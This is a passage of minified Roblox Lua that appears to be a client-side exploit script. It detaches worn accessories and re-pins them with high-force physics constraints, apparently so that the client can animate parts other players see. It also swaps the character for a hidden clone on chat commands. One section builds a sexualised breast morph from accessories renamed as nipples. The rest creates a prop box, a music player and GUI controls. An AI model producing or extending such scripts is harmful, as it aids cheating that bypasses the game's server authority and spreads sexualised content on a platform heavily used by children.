aZ=Instance.new("SpringConstraint")aZ.Parent=Torso;aZ.Name="Spring_L"aZ.Damping=5;aZ.FreeLength=1.25;aZ.Stiffness=aE;aZ.Attachment0=aO;aZ.Attachment1=aR;local a_=Instance.new("SpringConstraint")a_.Parent=Torso;a_.Name="Spring_R2"a_.Damping=2.5;a_.FreeLength=1.5;a_.Stiffness=aE;a_.Attachment0=aP;a_.Attachment1=aS;local b0=Instance.new("SpringConstraint")b0.Parent=Torso;b0.Name="Spring_L2"b0.Damping=2.5;b0.FreeLength=1.5;b0.Stiffness=aE;b0.Attachment0=aP;b0.Attachment1=aT;aH.Anchored=false;aJ.Anchored=false;local b1=aC:Clone()Color(b1,au)b1.Name="RightTiddie"b1.Parent=at;Weld(b1,b1.Pivot)WeldSingle(aH,b1.Pivot)local b2=aC:Clone()Color(b2,au)b2.Name="LeftTiddie"b2.Parent=at;Weld(b2,b2.Pivot)WeldSingle(aJ,b2.Pivot)wait(.5)aY.FreeLength=aF;aZ.FreeLength=aF;a_.FreeLength=aG;b0.FreeLength=aG;aY.Damping=aD;aZ.Damping=aD;a_.Damping=aD;b0.Damping=aD;aY.Stiffness=aE*1.25;aZ.Stiffness=aE*1.25;a_.Stiffness=aE;b0.Stiffness=aE end;function HatsOnly(Character)for T,b3 in pairs(Character:GetChildren())do if b3:IsA("Accoutrement")then local b4=false;for T=1,#AllowedAttachments do if b3.Handle:FindFirstChild(AllowedAttachments[T])then b4=true end end;if b4==false then b3:Destroy()end;if b4==true then b3.Handle.CustomPhysicalProperties=PhysicalProperties.new(0,0,0,0,0)end end end end;local b5=Instance.new("Folder")b5.Name="EventsFolder"b5.Parent=game:GetService("ReplicatedStorage")local b6=Instance.new("BindableEvent")b6.Name="MorphEvent"b6.Parent=b5;b6.Event:connect(function(b7,b8)for T,Player in pairs(game:GetService("Players"):GetPlayers())do if Player==b7 then local b9=Player.Character:GetChildren()for T=1,#b9 do if b9[T]:IsA("Clothing")then b9[T]:Destroy()end;if b9[T]:IsA("BasePart")then b9[T].Material=Enum.Material.SmoothPlastic end end;HatsOnly(Player.Character)wait(.1)if b8=="Female"then Bustify(Player.Character)end end end end)game:GetService("Players").PlayerAdded:connect(function(Player)Player.CharacterAdded:connect(function(Character)Character.Humanoid.JumpPower=37.5;Character.Humanoid.Died:Connect(function()RemoveMorph(Character)end)end)end)end))Model1.Name="Tiddie"Model1.Parent=mas;Part2.Name="Skin2"Part2.Transparency=1;Part2.CanCollide=false;Part2.Parent=Model1;Part2.CFrame=CFrame.new(0,3.17105055,-0.922661602,1,0,0,0,0.965925872,-0.258818984,0,0.258818984,0.965925872)Part2.Orientation=Vector3.new(15,0,0)Part2.Position=Vector3.new(0,3.17105055,-0.922661602)Part2.Rotation=Vector3.new(15,0,0)Part2.Color=Color3.new(0.356863,0.364706,0.411765)Part2.Size=Vector3.new(0.677085757,0.677085817,0.40625146)Part2.Anchored=true;Part2.BottomSurface=Enum.SurfaceType.Smooth;Part2.BrickColor=BrickColor.new("Smoky grey")Part2.CanCollide=false;Part2.Material=Enum.Material.SmoothPlastic;Part2.TopSurface=Enum.SurfaceType.Smooth;Part2.brickColor=BrickColor.new("Smoky grey")SpecialMesh3.Parent=Part2;SpecialMesh3.MeshType=Enum.MeshType.Sphere;Part4.Name="Pivot"Part4.Parent=Model1;Part4.CFrame=CFrame.new(0,3,-2.98023224e-08,1,0,0,0,1,0,0,0,1)Part4.Position=Vector3.new(0,3,-2.98023224e-08)Part4.Color=Color3.new(0.623529,0.631373,0.67451)Part4.Transparency=1;Part4.Size=Vector3.new(1,1,1)Part4.Anchored=true;Part4.BottomSurface=Enum.SurfaceType.Smooth;Part4.BrickColor=BrickColor.new("Fossil")Part4.CanCollide=false;Part4.Material=Enum.Material.SmoothPlastic;Part4.TopSurface=Enum.SurfaceType.Smooth;Part4.brickColor=BrickColor.new("Fossil")Part4.Shape=Enum.PartType.Ball;Part5.Name="Skin1"Part5.Parent=Model1;Part5.Transparency=1;Part5.CanCollide=false;Part5.CFrame=CFrame.new(0,2.99999952,-0.0999998078,1,0,0,0,1,0,0,0,1)Part5.Position=Vector3.new(0,2.99999952,-0.0999998078)Part5.Color=Color3.new(0.94902,0.952941,0.952941)Part5.Size=Vector3.new(2,2,2)Part5.Anchored=true;Part5.BottomSurface=Enum.SurfaceType.Smooth;Part5.BrickColor=BrickColor.new("White")Part5.Locked=true;Part5.TopSurface=Enum.SurfaceType.Smooth;Part5.brickColor=BrickColor.new("White")Part5.FormFactor=Enum.FormFactor.Symmetric;Part5.formFactor=Enum.FormFactor.Symmetric;Part5.Shape=Enum.PartType.Ball;Part6.Name="GenderChanger"Part6.Parent=mas;Part6.CFrame=CFrame.new(18.1999969,0.500033975,-17.6999989,1,0,0,0,1,0,0,0,1)Part6.Position=as.Position;Part6.Color=Color3.new(1,0.34902,0.34902)Part6.Size=Vector3.new(6,1,6)Part6.Anchored=true;Part6.BottomSurface=Enum.SurfaceType.Smooth;Part6.BrickColor=BrickColor.new("Persimmon")Part6.CanCollide=false;Part6.TopSurface=Enum.SurfaceType.Smooth;Part6.brickColor=BrickColor.new("Persimmon")Part6.Transparency=1;Script7.Name="ButtonScript"Script7.Parent=Part6;table.insert(cors,sandbox(Script7,function()local ba=script.Parent;local bb=false;local bc=game:GetService("ReplicatedStorage"):WaitForChild("EventsFolder").MorphEvent;ba.Touched:Connect(function(hit)if bb==false then local Player=game:GetService("Players"):GetPlayerFromCharacter(hit.Parent)if Player and Player.Character.Humanoid.Health>=0 then bc:Fire(Player,ba.Gender.Value)bb=true;wait(.5)bb=false end end end)end))StringValue8.Name="Gender"StringValue8.Parent=Part6;StringValue8.Value="Female"BlockMesh9.Parent=Part6;BlockMesh9.Offset=Vector3.new(0,2.5,0)Weld10.Parent=Part6;Weld10.C0=CFrame.new(-256,10,256,-1,0,0,0,0,1,0,1,0)Weld10.C1=CFrame.new(-274.200012,-0.500033975,273.700012,-1,0,0,0,0,1,0,1,0)Weld10.Part0=nil;Weld10.Part1=Part6;Weld10.part1=Part6;for T,v in pairs(mas:GetChildren())do v.Parent=workspace;pcall(function()v:MakeJoints()end)end;mas:Destroy()for T,v in pairs(cors)do spawn(function()pcall(v)end)end;local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local Humanoid=Character:WaitForChild("Humanoid")local R={nipple1=Character:WaitForChild("Pink Pom poms"),nipple2=Character:WaitForChild("PinkHeartPurse")}local S={fattiddie=Character:WaitForChild("Space Cop"),fatiddie=Character:WaitForChild("SpaceHelmetB")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=math.huge;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=math.huge end;wait(1)Part6.Position=Vector3.new(10000,10000,10000)W(R.nipple1.Handle,Character.Bust.RightTiddie.Skin2)W(R.nipple2.Handle,Character.Bust.LeftTiddie.Skin2)W(S.fattiddie.Handle,Character.Bust.RightTiddie.Skin1)W(S.fatiddie.Handle,Character.Bust.LeftTiddie.Skin1)R.nipple1.Handle.Attachment.Rotation=Vector3.new(0,90,0)R.nipple2.Handle.Attachment.Rotation=Vector3.new(-90,0,0)S.fattiddie.Handle.Attachment.Rotation=Vector3.new(0,0,0)S.fatiddie.Handle.Attachment.Rotation=Vector3.new(0,0,0)Character.Bust.RightTiddie:WaitForChild("Skin2"):FindFirstChild("Attachment").Name="Attachment69"Character.Bust.LeftTiddie:WaitForChild("Skin2"):FindFirstChild("Attachment").Name="Attachment420"Character.Bust.RightTiddie:WaitForChild("Skin2").Attachment69.Position=Vector3.new(0,0,0.65)Character.Bust.LeftTiddie:WaitForChild("Skin2").Attachment420.Position=Vector3.new(0,0,0.95)Character.Bust.RightTiddie.Skin2.CanCollide=true;Character.Bust.LeftTiddie.Skin2.CanCollide=true end)end;function Clickey3()pcall(function()local L=game:GetService("Players").LocalPlayer.Name;local M=workspace:WaitForChild(L)local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={rightarm=Character:WaitForChild("Hat1"),leftarm=Character:WaitForChild("Pal Hair"),rightleg=Character:WaitForChild("LavanderHair"),leftleg=Character:WaitForChild("Pink Hair"),torso=Character:WaitForChild("Meshes/CrescentHornsAccessory")}local S={head=Character:WaitForChild("Hollow"),box=Character:WaitForChild("Meshes/CrateAccessory"),vibe=Character:WaitForChild("VibeCheck"),rain=Character:WaitForChild("CloudyCloudCloudyCloud"),knife=Character:WaitForChild("YandereKnife")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;char=game:GetService("Players").LocalPlayer.Character;plr=game:GetService("Players").LocalPlayer;char.Archivable=true;bg2=char:Clone()bg2.Head.face.Texture="http://www.roblox.com/asset/?id=20612916"bg2.Archivable=false;bg2.Name="Trash"bgpoint2=Instance.new('Part',char)bgpoint2.Anchored=false;bgpoint2.CanCollide=false;bgpoint2.Transparency=1;bgpoint2.Size=Vector3.new(0.2,0.2,0.2)bg2.Parent=char;health=game:GetService("Players").LocalPlayer.Character.Humanoid.Health;game:GetService("Players").LocalPlayer.Chatted:connect(function(P)b=bg2.Head:getChildren()for T=1,#b do if b[T].className=="Part"then b[T]:Destroy()end end;if P=="swap"then game:GetService("Players").LocalPlayer.Character=game:GetService("Players").LocalPlayer.Character.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="back"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end end)for U,c in pairs(bg2:GetChildren())do if c:IsA('Accessory')then c:Destroy()end end;coroutine.resume(coroutine.create(function()while true do wait(0.1)bg2["Head"].Transparency=1;bg2["Left Arm"].Transparency=1;bg2["Left Leg"].Transparency=1;bg2["Right Leg"].Transparency=1;bg2["Right Arm"].Transparency=1;bg2["Torso"].Transparency=1;bg2.Head.face.Transparency=1 end end))do function GetDiscoColor(bd)bd=bd/4;local be=bd%1*3;local secondary=0.5*math.pi*(be%1)local bf;if be<1 then bf=Color3.new(1,1-math.cos(secondary),1-math.sin(secondary))elseif be<2 then bf=Color3.new(1-math.sin(secondary),1,1-math.cos(secondary))else bf=Color3.new(1-math.cos(secondary),1-math.sin(secondary),1)end;return bf end;function VertexRainbow()return Vector3.new(math.random(),math.random(),math.random())end;local plr=game:GetService("Players").LocalPlayer;local bg=plr.Character.Trash;local K=plr:GetMouse()local bh=plr.PlayerGui;local bi=bg["Left Leg"]local bj=bg["Right Leg"]local bk=bg["Left Arm"]local bl=bg["Right Arm"]local bm=bg.Head;local bn=bg.HumanoidRootPart;local torso=bg.Torso;local bo=false;local bp=false;bg.Animate.Disabled=true;local bq={['w']=false,['a']=false,['s']=false,['d']=false}local br=80;local bs=16;local bt=14;local bu=1000;local bw="Idling"local bx="Idling"local flying=false;local by=0;local bz=0;local bA=0;local bB=0;local bC=false;local bD=1;local bE=false;local bF=false;local bG=false;local bH=false;local bI=false;local bJ=false;local bK="Custom"local bL=bm:Clone()for T,x in pairs(bL:GetChildren())do if not x.ClassName:find('Mesh')then x:Destroy()end end;bL.Name='PseudoHead'bL.Parent=bg.Head;local bM=Instance.new('Weld',torso)bM.Part0=bm;bM.Name='PseudoHeadWeld'bM.Part1=bL;bm.Transparency=1;for T,x in pairs(bg:GetChildren())do if x:IsA'Hat'then x:destroy''end end;for T,x in pairs(bg:GetChildren())do for a,v in pairs(x:GetChildren())do if v:IsA'CharacterMesh'then v:destroy''end end end;local bN=Color3.new(1,0,0)local bO=Color3.new(0,0,1)local bP=game.Lighting;local bQ={"186897805","136214180","55365976","21214837","69643159","35035960","25499330","663532065","711219217","171754234","167241003","235558077","265452635","260161937","242814125","230417107","252230874","231949998","229222676","181607551","231953209","123431503","184905165","172755711","161494218","292791711","205912841","68953525","180163702","123385234","138847283","159127645","172511645","210175195","206539362","192486406","96613287","131764585","168427244","128595009","96687581","171590601","172329151","72116648","221557708","214883980"}local bR={"152628549","152629684","192467477","249062488","173846873","246990310","246990269","233853776","256301393","246990343","173846290","184779655","152628663","168044411"}local bS={"390409627","390409627"}local bT=1;local bU={{"Grapes","16940906","16940893",Vector3.new(.8,.8,.8),"284627310"},{"Lightbulb","1376459","1376456",Vector3.new(1,1,1),"235040768"},{"Turkey","13073626","13073598",Vector3.new(2,2,2),"284627310"},{"JuiceBottle","57219451","57219520",Vector3.new(1.75,1.75,1.75),"235040768"},{"Can","10470609","10470600",Vector3.new(1,1,1),"284627310"},{"dunno lol","55304507","55304460",Vector3.new(1,1,1),"235040768"},{"Burger","16646125","16432575",Vector3.new(1.1,1.1,1.1),"284627310"},{"Candy","38160912","38161977",Vector3.new(1.15,1.15,1.15),"154162195"},{"Sandwich","12510164","12509672",Vector3.new(2.5,2.5,2.5),"284627310"}}coroutine.wrap(function()for T,x in pairs(bm:GetChildren())do if x:IsA('Sound')then x:Destroy()end end end)()function Lerp(a,b,T)local bV={a.X,a.Y,a.Z,a:toEulerAnglesXYZ()}local bW={b.X,b.Y,b.Z,b:toEulerAnglesXYZ()}local bX=bV[1]+(bW[1]-bV[1])*T;local bY=bV[2]+(bW[2]-bV[2])*T;local bZ=bV[3]+(bW[3]-bV[3])*T;local b_=bV[4]+(bW[4]-bV[4])*T;local c0=bV[5]+(bW[5]-bV[5])*T;local c1=bV[6]+(bW[6]-bV[6])*T;return CFrame.new(bX,bY,bZ)*CFrame.Angles(b_,c0,c1)end;function TwnSingleNumber(s,f,m)local c2=s+(f-s)*m;return c2 end;function TwnVector3(q,c4,c5)local c6={q.x,q.y,q.z}local c7={c4.x,c4.y,c4.z}local c8=c6[1]+(c7[1]-c6[1])*c5;local c9=c6[2]+(c7[2]-c6[2])*c5;local cb=c6[3]+(c7[3]-c6[3])*c5;return Vector3.new(c8,c9,cb)end;newWeld=function(cc,cd,ce,cg,ch,ci)cc=Instance.new("Weld",ce)cc.Part0=cd;cc.Part1=ce;cc.C0=CFrame.new(cg,ch,ci)end;newWeld(law,torso,bk,-1.5,0.5,0)newWeld(raw,torso,bl,1.5,0.5,0)newWeld(llw,torso,bi,-.5,-2,0)newWeld(rlw,torso,bj,.5,-2,0)newWeld(hw,torso,bm,0,1.5,0)local cj=Instance.new('Weld',bn)cj.Part0=bn;cj.Part1=torso;bn.Weld.C1=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),0)bk.Weld.C1=CFrame.new(0,0.5,0)*CFrame.Angles(math.rad(0),0,0)bl.Weld.C1=CFrame.new(0,0.5,0)*CFrame.Angles(math.rad(0),0,0)bj.Weld.C1=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),0,0)bi.Weld.C1=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),0,0)local ck=Instance.new('BodyVelocity',bn)ck.maxForce=Vector3.new(0,0,0)BOM=Instance.new("Sound",bg)BOM.SoundId="http://www.roblox.com/asset/?id=138014729"BOM.Pitch=1.2;BOM.Volume=1;BOM.Looped=false;BOM.Name='BOM!'n2=Instance.new("Sound",bg)n2.SoundId="http://www.roblox.com/asset/?id=388109043"n2.Pitch=0.95;n2.Volume=2;n2.Looped=false;n2:Play()n2.Name='BOX!'local cl=Instance.new('Model',bg)cl.Name="trueMetalGearBox"local cm=Instance.new('Model',cl)cm.Name='nostap'local co=Instance.new('Model',cm)co.Name="itstimetostopp"local base=Instance.new('Part',co)base.formFactor=3;base.TopSurface=10;base.BottomSurface=10;base.LeftSurface=10;base.RightSurface=10;base.FrontSurface=10;base.BackSurface=10;base.Locked=true;base.CanCollide=true;base.Anchored=false;base.BrickColor=BrickColor.new('Fossil')base.Name='Can1'base.Transparency=1;base.Size=Vector3.new(3,3.5,3)base.Material='Metal'local cp=Instance.new("CylinderMesh",base)local cq=Instance.new('Part',co)cq.formFactor=3;cq.TopSurface=10;cq.BottomSurface=10;cq.LeftSurface=10;cq.RightSurface=10;cq.FrontSurface=10;cq.BackSurface=10;cq.Locked=true;cq.CanCollide=false;cq.Anchored=false;cq.BrickColor=BrickColor.new('Really black')cq.Name='InnerCan'cq.Size=Vector3.new(2.8,.2,2.8)cq.Material='SmoothPlastic'cq.Transparency=0;local cr=Instance.new('SpecialMesh',cq)cr.Scale=Vector3.new(1,0.05,1)cr.MeshId="http://www.roblox.com/asset/?id=173330346"local cs=Instance.new('Part',co)cs.formFactor=3;cs.TopSurface=10;cs.BottomSurface=10;cs.LeftSurface=10;cs.RightSurface=10;cs.FrontSurface=10;cs.BackSurface=10;cs.Locked=true;cs.CanCollide=true;cs.Anchored=false;cs.BrickColor=BrickColor.new('Burlap')cs.Name='Can2'cs.Transparency=0;cs.Size=Vector3.new(2,2.5,2)cs.Material='Metal'local ct=Instance.new('SpecialMesh',cs)ct.Scale=Vector3.new(1.2,1.2,1.2)ct.MeshId="http://www.roblox.com/asset/?id=173330346"local cu=Instance.new('Part',co)cu.Name='Lid'cu.formFactor=3;cu.TopSurface=10;cu.BottomSurface=10;cu.LeftSurface=10;cu.RightSurface=10;cu.BackSurface=10;cu.FrontSurface=10;cu.CanCollide=true;cu.Anchored=false;cu.Locked=true;cu.Size=Vector3.new(3,3,.2)cu.BrickColor=BrickColor.new('Burlap')local cv=Instance.new('Part',co)cv.formFactor=3;cv.TopSurface=10;cv.BottomSurface=10;cv.LeftSurface=10;cv.RightSurface=10;cv.FrontSurface=10;cv.BackSurface=10;cv.Locked=true;cv.CanCollide=true;cv.Anchored=false;cv.BrickColor=BrickColor.new('Fossil')cv.Name='Can'cv.Size=Vector3.new(.1,3,.1)cv.Material='Metal'cv.Transparency=1;local cw=Instance.new("CylinderMesh",cv)cw.Scale=Vector3.new(.5,1,.5)local cx=Instance.new('Part',co)cx.formFactor=3;cx.TopSurface=10;cx.BottomSurface=10;cx.LeftSurface=10;cx.RightSurface=10;cx.FrontSurface=10;cx.BackSurface=10;cx.Locked=true;cx.CanCollide=true;cx.Anchored=false;cx.BrickColor=BrickColor.new('Dark stone grey')cx.Name='Can'cx.Size=Vector3.new(.1,.1,2.9)cx.Material='Metal'cx.Transparency=1;local cy=Instance.new("BlockMesh",cx)cy.Scale=Vector3.new(.5,.1,1)local cz=Instance.new('Part',co)cz.formFactor=3;cz.TopSurface=10;cz.BottomSurface=10;cz.LeftSurface=10;cz.RightSurface=10;cz.FrontSurface=10;cz.BackSurface=10;cz.Locked=true;cz.CanCollide=false;cz.Anchored=false;cz.BrickColor=BrickColor.new('Dark stone grey')cz.Name='Can'cz.Size=Vector3.new(.1,.1,3.9)cz.Material='Metal'cz.Transparency=1;local cA=Instance.new("BlockMesh",cz)cA.Scale=Vector3.new(.5,.1,1)local cB=Instance.new('Sound',cu)cB.Name='hit'cB.SoundId="http://www.roblox.com/asset?id=138259748"cB.Volume=.3;cB.Pitch=.9;local cC=Instance.new('Sound',cu)cC.Name='Open'cC.Volume=2;cC.Pitch=1.4;cC.SoundId="http://www.roblox.com/asset?id=192416578"local cD=Instance.new('SpecialMesh',cu)cD.Scale=Vector3.new(1.17,0.05,1.17)cD.MeshId="http://www.roblox.com/asset/?id=173330346"coroutine.resume(coroutine.create(function()while wait()do end end))local cE=Instance.new('Part',co)cE.Name='cricri'cE.formFactor=3;cE.TopSurface=10;cE.BottomSurface=10;cE.LeftSurface=10;cE.RightSurface=10;cE.BackSurface=10;cE.FrontSurface=10;cE.CanCollide=false;cE.Anchored=false;cE.Transparency=0;cE.Locked=true;cE.Size=Vector3.new(2,.2,2)local cF=Instance.new('Decal',cE)cF.Texture="http://www.roblox.com/asset?id=0"cF.Face='Top'local cG=Instance.new('Part',co)cG.Name='boombox'cG.formFactor=3;cG.TopSurface=10;cG.BottomSurface=10;cG.LeftSurface=10;cG.RightSurface=10;cG.BackSurface=10;cG.FrontSurface=10;cG.CanCollide=false;cG.Anchored=false;cG.Transparency=0;cG.Locked=true;cG.Size=Vector3.new(2,2,1)local cH=Instance.new('SpecialMesh',cG)cH.Scale=Vector3.new(3,3,3)cH.MeshId="http://www.roblox.com/asset?id=212302951"cH.TextureId="http://www.roblox.com/asset?id=212303049"local cI=Instance.new('Part',co)cI.Name='lightbulb'cI.formFactor=3;cI.TopSurface=10;cI.BottomSurface=10;cI.LeftSurface=10;cI.RightSurface=10;cI.BackSurface=10;cI.FrontSurface=10;cI.CanCollide=false;cI.Anchored=false;cI.Transparency=.4;cI.Locked=true;cI.Size=Vector3.new(.8,1,.8)local cJ=Instance.new('PointLight',cI)cJ.Range=0;cJ.Color=BrickColor.new('New Yeller').Color;cJ.Enabled=false;cJ.Shadows=true;local cK=Instance.new('SpecialMesh',cI)cK.MeshId="http://www.roblox.com/asset?id=1376459"cK.TextureId="http://www.roblox.com/asset?id=1376456"local cL=Instance.new('Weld',torso)cL.Part0=torso;cL.Part1=base;cL.C1=CFrame.new(0,-.5,0)cL.C0=CFrame.new(0,0,0)local cM=Instance.new('Weld',cq)cM.Part0=base;cM.Part1=cq;cM.C1=CFrame.new(0,-0.8,0)cM.C0=CFrame.new(0,0,0)local cN=Instance.new('Weld',cs)cN.Part0=base;cN.Part1=cs;cN.C1=CFrame.new(0,0.4,0)cN.C0=CFrame.new(0,0,0)local cO=Instance.new('Weld',base)cO.Part0=base;cO.Part1=cu;cO.C1=CFrame.new(0,-0.9,0)*CFrame.Angles(math.rad(0),math.rad(0),0)local cP=Instance.new('Weld',base)cP.Part0=base;cP.Part1=cE;cP.C1=CFrame.new(0,-0.1,0.4)*CFrame.Angles(math.rad(90),0,0)local cQ=Instance.new('Weld',base)cQ.Part0=base;cQ.Part1=cG;cQ.C1=CFrame.new(0,0.4,0)local cR=Instance.new('Weld',base)cR.Part0=base;cR.Part1=cI;cR.C1=CFrame.new(0,.5,0)local cS=Instance.new('Weld',base)cS.Part0=base;cS.Part1=cv;cS.C1=CFrame.new(0,0,0)local cT=Instance.new('Weld',cv)cT.Part0=cv;cT.Part1=cx;cT.C1=CFrame.new(0,-1.475,0)local cU=Instance.new('Weld',cv)cU.Part0=cv;cU.Part1=cz;cU.C1=CFrame.new(0,5,0)*CFrame.Angles(0,math.pi/2,0)local cV=Instance.new('PointLight',cv)cV.Enabled=false;cV.Brightness=0;cV.Range=0;cV.Color=BrickColor.new("Dark green").Color;local music=Instance.new('Sound',cG)music.Name='ok music'music.Volume=.025;music.Pitch=1;music.SoundId="http://www.roblox.com/asset?id="..bS[math.random(1,#bS)]music.Looped=true;local cW=Instance.new('Sound',cv)cW.SoundId="http://www.roblox.com/asset?id=319807127"cW.Volume=0.5;cW.Pitch=3;cW.Looped=true;local u=Instance.new('ScreenGui',plr.PlayerGui)u.Name='you make me cri'local cX=Instance.new('Frame',u)cX.Name='TopFrame'cX.Size=UDim2.new(1,0,1,0)cX.BorderSizePixel=0;cX.BackgroundTransparency=1;local cY=Instance.new('Frame',cX)cY.Size=UDim2.new(.4,0,.05,0)cY.Draggable=true;cY.BackgroundTransparency=.7;cY.Position=UDim2.new(.3,0,.775,0)cY.BackgroundColor3=Color3.new(.2,.2,.2)cY.BorderColor3=Color3.new(0,0,0)local cZ=Instance.new('Frame',cY)cZ.Size=UDim2.new(.5,0,1,0)cZ.Draggable=true;cZ.BackgroundTransparency=.9;cZ.Position=UDim2.new(0,0,0,0)cZ.BackgroundColor3=Color3.new(.2,.2,.2)cZ.BorderColor3=Color3.new(0,0,0)local c_=Instance.new('Frame',cY)c_.Visible=true;c_.Size=UDim2.new(.5,0,1,0)c_.Draggable=false;c_.BackgroundTransparency=.5;c_.Position=UDim2.new(0,0,1,1)c_.BackgroundColor3=Color3.new(.2,.2,.2)c_.BorderColor3=Color3.new(0,0,0)local d0=Instance.new('TextBox',c_)d0.Size=UDim2.new(.8,0,.7,0)d0.Position=UDim2.new(.1,0,.15,0)d0.BackgroundTransparency=.7;d0.Visible=true;d0.Text="Image ID"d0.TextScaled=true;d0.TextStrokeTransparency=0;d0.TextStrokeColor3=Color3.new(.1,.1,.1)d0.TextColor3=Color3.new(.7,.7,.7)d0.BackgroundColor3=Color3.new(.2,.2,.2)d0.BorderColor3=Color3.new(0,0,0)d0.FocusLost:connect(function(d1)if d1 then cF.Texture="http://www.roblox.com/asset?id="..d0.Text-1 end end)local d2=Instance.new('TextButton',cZ)d2.Draggable=false;d2.BackgroundTransparency=.9;d2.BackgroundColor3=Color3.new(.2,.2,.2)d2.Size=UDim2.new(.5,0,1,0)d2.Text="Custom"d2.TextStrokeTransparency=0;d2.TextColor3=Color3.new(.7,.7,.7)d2.TextScaled=true;d2.TextStrokeColor3=Color3.new(.1,.1,.1)d2.Font="SourceSans"d2.MouseButton1Click:connect(function()if bK=='Table'then bK="Custom"c_.Visible=true;d0.Visible=true end end)local d3=Instance.new('TextButton',cZ)d3.Draggable=false;d3.BackgroundTransparency=.9;d3.BackgroundColor3=Color3.new(.1,.1,.1)d3.Size=UDim2.new(.5,0,1,0)d3.Position=UDim2.new(.5,0,0,0)d3.Text="Table"d3.TextStrokeTransparency=0;d3.TextColor3=Color3.new(.7,.7,.7)d3.TextScaled=true;d3.TextStrokeColor3=Color3.new(.1,.1,.1)d3.Font="SourceSans"d3.MouseButton1Click:connect(function()if bK~='Table'then bK="Table"d0.Visible=false;c_.Visible=false;cF.Texture="http://www.roblox.com/asset?id="..bR[bD]-1 end end)local d4=Instance.new('Frame',cY)d4.Size=UDim2.new(.5,0,1,0)d4.Position=UDim2.new(.5,0,0,0)d4.Draggable=true;d4.BackgroundTransparency=.9;d4.BackgroundColor3=Color3.new(.2,.2,.2)d4.BorderColor3=Color3.new(0,0,0)local d5=Instance.new('Frame',cY)d5.Size=UDim2.new(.5,0,1,0)d5.Draggable=false;d5.BackgroundTransparency=.5;d5.Position=UDim2.new(.5,0,1,1)d5.BackgroundColor3=Color3.new(.2,.2,.2)d5.BorderColor3=Color3.new(0,0,0)local d6=Instance.new('TextBox',d5)d6.Size=UDim2.new(.8,0,.7,0)d6.Position=UDim2.new(.1,0,.15,0)d6.BackgroundTransparency=.7;d6.Visible=true;d6.Text="Music ID"d6.TextScaled=true;d6.TextStrokeTransparency=0;d6.TextStrokeColor3=Color3.new(.1,.1,.1)d6.TextColor3=Color3.new(.7,.7,.7)d6.BackgroundColor3=Color3.new(.2,.2,.2)d6.BorderColor3=Color3.new(0,0,0)d6.FocusLost:connect(function(d1)if d1 then music.SoundId="http://www.roblox.com/asset?id="..d6.Text end end)local d7=Instance.new('TextButton',d4)d7.Draggable=false;d7.BackgroundTransparency=.9;d7.BackgroundColor3=Color3.new(.2,.2,.2)d7.Size=UDim2.new(.5,0,1,0)d7.Text="Play"d7.TextStrokeTransparency=0;d7.TextColor3=Color3.new(.7,.7,.7)d7.TextScaled=true;d7.TextStrokeColor3=Color3.new(.1,.1,.1)d7.Font="SourceSans"d7.MouseButton1Click:connect(function()if not music.IsPlaying then d6.Visible=false;music:play''d5.Visible=false end end)local d8=Instance.new('TextButton',d4)d8.Draggable=false;d8.BackgroundTransparency=.9;d8.BackgroundColor3=Color3.new(.1,.1,.1)d8.Size=UDim2.new(.5,0,1,0)d8.Position=UDim2.new(.5,0,0,0)d8.Text="Stop"d8.TextStrokeTransparency=0;d8.TextColor3=Color3.new(.7,.7,.7)d8.TextScaled=true;d8.TextStrokeColor3=Color3.new(.1,.1,.1)d8.Font="SourceSans"d8.MouseButton1Click:connect(function()if music.IsPlaying then music:stop''d6.Visible=true;d5.Visible=true end end)K.KeyDown:connect(function(d9)if string.byte(d9)==304 and not bo then runnin=true end;if d9=='x'and bE and not opencd and not bJ then Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.boombox.Attachment666.Position=Vector3.new(0,1,0)cC:play''opencd=true;bF=true end;if d9=='w'then bq.w=true end;if d9=='a'then bq.a=true end;if d9=='s'then bq.s=true end;if d9=='d'then bq.d=true end;if string.byte(d9)==50 then if bo and bE then bE=false;bo=false;if opencd then opencd=false;bF=false;bG=false end elseif not bo and not bE then bo=true;bE=true;bg.Humanoid.WalkSpeed=bs*.75 end end;if d9=='r'and not bJ then if not heli and not opencd and not bJ and bE then 